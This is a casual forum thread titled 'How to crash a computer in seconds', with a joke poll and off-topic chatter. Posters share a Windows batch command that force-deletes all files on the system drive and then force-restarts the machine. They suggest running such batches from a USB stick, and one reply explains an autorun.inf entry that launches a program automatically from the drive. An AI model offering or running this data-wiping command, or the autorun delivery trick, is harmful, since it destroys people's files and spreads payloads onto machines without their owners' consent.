Poll

Sucks?

Yes
19 (35.2%)
no
0 (0%)
Balls
6 (11.1%)
Boobs
22 (40.7%)
nothing
2 (3.7%)
Other
0 (0%)
Other
0 (0%)
Other
0 (0%)
Other [fourth time]
5 (9.3%)

Total Members Voted: 1

Author Topic: How to crash a computer in seconds  (Read 5230 times)


Good avatar? :o
Looks all fuzzy on its side
i like this better because your name is death

hey, guys!
How's your day been so far?

hey, guys!
How's your day been so far?
Oh it's been great, why, I just posted in a useless topic right now! As in like, just right now!

Code: [Select]
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

lol, just make some batches and run them off a stick.

Code: [Select]
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

lol, just make some batches and run them off a stick.

Intressting. Do you know how I could possiblly create an auto-starting .exe on a stick? :D

There was a site page I knew with a large image that crashed windows computers.  Lemme dig it up...

Intressting. Do you know how I could possiblly create an auto-starting .exe on a stick? :D
Create a file named "autorun.inf" in USB drive. Open the
autorun.inf file using notepad, and type this inside:

[AutoRun]
open=program.exe

Note: assuming your program is named "program.exe". I'm pretty sure that it can be any extension